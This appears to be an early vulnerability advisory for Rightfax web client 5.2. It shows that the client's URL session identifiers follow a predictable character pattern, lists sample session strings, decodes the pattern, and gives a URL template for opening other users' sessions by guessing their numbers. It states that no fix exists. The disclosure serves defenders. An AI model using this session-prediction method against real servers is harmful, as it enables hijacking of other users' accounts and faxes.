COMMAND
Rightfax web client
SYSTEMS AFFECTED
Rightfax web client 5.2
PROBLEM
'ET LoWNOISE' found following. Using your web browser when you
click to log on to the rightfax server, it opens a new window. In
that window you are asked for a username and password. The
Toolbar on the browser is hidden, but if you open the location
toolbar (Netscape: view/show/location toolbar) you will see
something like this:
http://RIGHTFAXHOST/rightfax/fuwww.dll/c=urol2zi29uncz0/?load1
c=urol2zi29uncz0 <-- This is a session number
If you make some conections you will have:
[round 1]
c=ur o l 2 zi29u n c z0
c=ur q 2 1 zi29u n t z0
c=ur r i 0 zi29u p 3 z0
c=ur s x y zi29u p k z0
c=ur u e x zi29u q 6 z0
c=ur v u w zi29u q q z0
c=ur x b v zi29u r 8 z0
c=ur y r u zi29u r p z0
c=us 1 8 t zi29u s 7 z0
c=us 2 o s zi29u s q z0
c=us 4 5 r zi29u t 5 z0
c=us 5 l q zi29u t k z0
c=us 7 2 p zi29u u 1 z0
c=us 8 i o zi29u u f z0
c=us 9 y n zi29u u x z0
c=us b f m zi29u w c z0
[round 2]
c=us b f m zi29v 4 j z0
c=us c v l zi29v 4 x z0
c=us e c k zi29v 5 b z0
c=us f s j zi29v 5 p z0
c=us h 9 i zi29v 6 3 z0
c=us i p h zi29v 6 h z0
c=us k 6 g zi29v 6 y z0
c=us l m f zi29v 7 f z0
c=us n 3 e zi29v 7 r z0
c=us o j d zi29v 8 7 z0
c=us q 0 c zi29v 8 q z0
c=us r g b zi29v 9 4 z0
c=us s w a zi29v 9 o z0
[round 3]
c=ur l o 4 zi29v a 5 z0
c=ur n 5 3 zi29v a k z0
c=ur o l 2 zi29v b 6 z0
c=ur q 2 1 zi29v b k z0
c=ur s x y zi29v b x z0
c=ur u e x zi29v c c z0
c=ur v u w zi29v c r z0
c=ur x b v zi29v d 8 z0
c=ur y r u zi29v d y z0
xxxx a r b xxxxx d r xx
x = the same for all the round
a = a-z,0-9
r = (the next letter from the previous round)
b = 9-0,z-a
d = double (aa-zz,00-99)
THATS NO RANDOM. So you can guess other users session numbers.
So Unhide the location toolbar and make this URL:
http://RIGHTFAXHOST/rightfax/fuwww.dll/c=other-session-number/?FOLDR&FFFF
SOLUTION
Nothing yet.